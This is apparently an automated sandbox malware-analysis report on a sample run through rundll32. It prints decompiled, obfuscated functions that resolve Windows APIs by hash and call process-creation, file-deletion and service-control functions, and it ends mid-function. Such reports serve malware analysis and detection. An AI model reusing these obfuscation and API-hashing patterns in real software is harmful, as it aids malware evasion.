Associated: 0000000C.00000002.2118100865.00000000006BC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6a0000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: 51a2f7d95d8aebe082ec92f5e4d19b30a1932b30bc120df3cf4cd6324a8af425
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: 1A018BB6D00308BBEF00DFA4C94A5DEBBB1AB40318F108088E40466291D7B18B649B90

Uniqueness

Uniqueness Score: -1.00%

Function 006A4859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E006A4859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E006B07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x006a485e
0x006a487a
0x006a487d
0x006a4884
0x006a488b
0x006a4892
0x006a489d
0x006a48a0
0x006a48ad
0x006a48b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 006A48B7

Strings

[, xrefs: 006A488B

Memory Dump Source

Source File: 0000000C.00000002.2118054956.00000000006A1000.00000020.00000001.sdmp, Offset: 006A0000, based on PE: true

Associated: 0000000C.00000002.2118045798.00000000006A0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2118100865.00000000006BC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6a0000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: ce71d3195dc8902f213ae24ef2caca72f67f41b2e533a8f4bc88708014406498
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 3AF017B0A05209FBEB44CFE8CA5699EBFB9EB40301F20819CE444B7290E7B15F509B54

Uniqueness

Uniqueness Score: -1.00%

Function 006B4F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E006B4F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E006A602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E006B07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x006b4f80
0x006b4f81
0x006b4f82
0x006b4f86
0x006b4f87
0x006b4f8c
0x006b4fa5
0x006b4fa8
0x006b4faf
0x006b4fb6
0x006b4fc7
0x006b4fca
0x006b4fd7
0x006b4fe2
0x006b4fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 006B4FE2

Strings

{#lm, xrefs: 006B4FC2

Memory Dump Source

Source File: 0000000C.00000002.2118054956.00000000006A1000.00000020.00000001.sdmp, Offset: 006A0000, based on PE: true

Associated: 0000000C.00000002.2118045798.00000000006A0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2118100865.00000000006BC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6a0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: 8c82c594571ba6a9f7bec625451c810ba13f38370f13f3c75356233e129e137f
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: 75F037B081120CFFEB04EFA4DA4289EBFBAEB40300F20819DE804AB250D7715B509B54

Uniqueness

Uniqueness Score: -1.00%

Function 006B976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E006B976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006A602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E006B07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x006b9772
0x006b9773
0x006b9778
0x006b977a
0x006b977b
0x006b977e
0x006b977f
0x006b9782
0x006b9785
0x006b9788
0x006b9789
0x006b978c
0x006b978f
0x006b9790
0x006b9791
0x006b9794
0x006b9797
0x006b979a
0x006b979d
0x006b97a0
0x006b97a3
0x006b97a6
0x006b97a7
0x006b97a8
0x006b97ad
0x006b97b7
0x006b97c3
0x006b97ca
0x006b97d1
0x006b97d8
0x006b97df
0x006b97e3
0x006b97fc
0x006b9816
0x006b981d

APIs

CreateProcessW.KERNEL32(006A591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,006A591A), ref: 006B9816

Memory Dump Source

Source File: 0000000C.00000002.2118054956.00000000006A1000.00000020.00000001.sdmp, Offset: 006A0000, based on PE: true

Associated: 0000000C.00000002.2118045798.00000000006A0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2118100865.00000000006BC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6a0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 112dee98fc26badcc1aaf5ef4f711c79e939f4cddb57fd23271ba9ef9e1f6d6a
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 2D11D372800148BBDF599F92DC0ACDF7F3AEF89750F104048FA1452120D2728AA0EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 006AB566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E006AB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E006A602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E006B07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x006ab569
0x006ab56a
0x006ab56d
0x006ab572
0x006ab574
0x006ab577
0x006ab57a
0x006ab57d
0x006ab580
0x006ab583
0x006ab586
0x006ab587
0x006ab58a
0x006ab58d
0x006ab590
0x006ab593
0x006ab594
0x006ab595
0x006ab59a
0x006ab5a4
0x006ab5b8
0x006ab5c0
0x006ab5c4
0x006ab5cb
0x006ab5d2
0x006ab5d9
0x006ab5e6
0x006ab5fd
0x006ab604

APIs

CreateFileW.KERNELBASE(006B0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,006B0668,?,?,?,?), ref: 006AB5FD

Memory Dump Source

Source File: 0000000C.00000002.2118054956.00000000006A1000.00000020.00000001.sdmp, Offset: 006A0000, based on PE: true

Associated: 0000000C.00000002.2118045798.00000000006A0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2118100865.00000000006BC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6a0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: c16d9730b514023f3d3ac75a92bc9916b98891876df429c51777583a2a7b7562
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: 4611B272801248BBDF56DF95DD06CEE7F7AEF89314F148198FA1862120D3729A60EB50

Uniqueness

Uniqueness Score: -1.00%

Function 006B981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E006B981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006A602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E006B07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x006b9821
0x006b9822
0x006b9825
0x006b9828
0x006b982a
0x006b982c
0x006b982f
0x006b9832
0x006b9835
0x006b9836
0x006b9837
0x006b983c
0x006b9855
0x006b9858
0x006b985f
0x006b9866
0x006b986d
0x006b9874
0x006b987b
0x006b988e
0x006b989b
0x006b98a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,006A87F2,0000CAAE,0000510C,AD82F196), ref: 006B989B

Memory Dump Source

Source File: 0000000C.00000002.2118054956.00000000006A1000.00000020.00000001.sdmp, Offset: 006A0000, based on PE: true

Associated: 0000000C.00000002.2118045798.00000000006A0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2118100865.00000000006BC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6a0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: dc55ed54f0533d4d0d56fc41a965174feb45049d4bce98e70494bc7e61afa025
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: B7019E72801208FBDB04EFD5D846CDFBF79EF85310F10819CF90866220E6715B519BA0

Uniqueness

Uniqueness Score: -1.00%

Function 006B7BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E006B7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E006A602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E006B07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x006b7bf7
0x006b7bf8
0x006b7bfa
0x006b7bfd
0x006b7bff
0x006b7c02
0x006b7c06
0x006b7c07
0x006b7c0f
0x006b7c1d
0x006b7c25
0x006b7c2d
0x006b7c31
0x006b7c38
0x006b7c3f
0x006b7c46
0x006b7c4a
0x006b7c5e
0x006b7c67
0x006b7c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 006B7C67

Memory Dump Source

Source File: 0000000C.00000002.2118054956.00000000006A1000.00000020.00000001.sdmp, Offset: 006A0000, based on PE: true

Associated: 0000000C.00000002.2118045798.00000000006A0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2118100865.00000000006BC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6a0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 6559fa7c5527258189938deba91d8fd21955e06baec5336cad2358f1e131deb8
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: 55014BB190120CFFEB49DFA4C94A8DEBBB9EF45314F208198F505A7240EAB19F509B91

Uniqueness

Uniqueness Score: -1.00%

Function 006AF65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E006AF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E006A602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E006B07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x006af662
0x006af663
0x006af665
0x006af668
0x006af66a
0x006af66d
0x006af670
0x006af673
0x006af677
0x006af678
0x006af67d
0x006af687
0x006af693
0x006af69a
0x006af6a1
0x006af6a5
0x006af6a9
0x006af6b0
0x006af6c9
0x006af6d8
0x006af6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 006AF6D8

Memory Dump Source

Source File: 0000000C.00000002.2118054956.00000000006A1000.00000020.00000001.sdmp, Offset: 006A0000, based on PE: true

Associated: 0000000C.00000002.2118045798.00000000006A0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2118100865.00000000006BC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6a0000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 80288296ecac8b9ad5690eab66a77db31a485bc5109723959c2b3aaee36d3370
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: F901E5B6901208BBEF05AF94DD068DF7F75EB05324F148188F90462250D6B25E61DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 006AB6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E006AB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E006A602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E006B07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x006ab6f3
0x006ab6f8
0x006ab702
0x006ab70b
0x006ab712
0x006ab719
0x006ab720
0x006ab727
0x006ab72e
0x006ab747
0x006ab759
0x006ab75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 006AB759

Memory Dump Source

Source File: 0000000C.00000002.2118054956.00000000006A1000.00000020.00000001.sdmp, Offset: 006A0000, based on PE: true

Associated: 0000000C.00000002.2118045798.00000000006A0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2118100865.00000000006BC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6a0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: 3ad7fdbfcc57dd926dadd7087ebd3dc92af794c633ee7be2288ffadf4dd0babd
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: 60012CB5941308FBEB45DF94DD06A9E7BB5EB14704F108188FA0566190D7B15E209B51

Uniqueness

Uniqueness Score: -1.00%

Function 006BAA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E006BAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E006A602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E006B07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x006baa3f
0x006baa40
0x006baa41
0x006baa44
0x006baa47
0x006baa4b
0x006baa4c
0x006baa51
0x006baa5b
0x006baa64
0x006baa68
0x006baa6f
0x006baa76
0x006baa8d
0x006baa90
0x006baa9d
0x006baaa8
0x006baaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 006BAAA8

Memory Dump Source

Source File: 0000000C.00000002.2118054956.00000000006A1000.00000020.00000001.sdmp, Offset: 006A0000, based on PE: true

Associated: 0000000C.00000002.2118045798.00000000006A0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2118100865.00000000006BC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6a0000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: f2d0d81379d1f9cd65ce0af4336d077ae44226bfe97a9769fe90ed06f362c536
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: A6F046B190020CFFDB08EFA4D94A89EBFB5EB41304F108098F905A6250D6B29B549B50

Uniqueness

Uniqueness Score: -1.00%

Function 006A5FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E006A5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E006A602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E006B07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x006a5fb5
0x006a5fb6
0x006a5fb7
0x006a5fbb
0x006a5fbc
0x006a5fc1
0x006a5fcb
0x006a5fd7
0x006a5fde
0x006a5fe5
0x006a5ffc
0x006a5fff
0x006a6006
0x006a600d
0x006a601a
0x006a6025
0x006a602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 006A6025

Memory Dump Source

Source File: 0000000C.00000002.2118054956.00000000006A1000.00000020.00000001.sdmp, Offset: 006A0000, based on PE: true

Associated: 0000000C.00000002.2118045798.00000000006A0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2118100865.00000000006BC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6a0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: 4c0895336b33871b73bf90af875dc2e2a466e42bf61502a0e1083d5eb46d0739
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: C6F04FB0C11208FFEB48DFA0E94689EBFB9EB40300F20819CE509A7260E7719F559F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2836 Parent PID: 2452 rundll32.exeCOMMON

Executed Functions

Function 001B2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E001B2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E001B602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E001C07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 001B29DC

Strings

<^, xrefs: 001B2977

Memory Dump Source

Source File: 0000000D.00000002.2121760438.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000D.00000002.2121753529.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2121787261.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 30dfe23d4da1fee25088d072443731b0ff0781665e5998f83e193314ba0cf3bf
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: C1018471900108BFEB14DF95DC0A8DFBFB6EF54310F108048F50866250D7B55F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 001BC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E001BC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E001B602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E001C07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x001bc6e1
0x001bc6e6
0x001bc6f0
0x001bc6fc
0x001bc703
0x001bc706
0x001bc70d
0x001bc711
0x001bc715
0x001bc71c
0x001bc723
0x001bc72a
0x001bc731
0x001bc738
0x001bc751
0x001bc762
0x001bc768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 001BC762

Strings

/O, xrefs: 001BC6E6

Memory Dump Source

Source File: 0000000D.00000002.2121760438.00000000001B1000.00000020.00000001.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000D.00000002.2121753529.00000000001B0000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2121787261.00000000001CC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 46e2d91a0fb16c85d3561f04043ab603bb37657e41196792dbba4e1767537ef8
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: 441133B290122DBBCB25DF95DC4A8DFBFB8EF14714F108188F90962210D3714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 001B1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E001B1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001B602B(_t33);
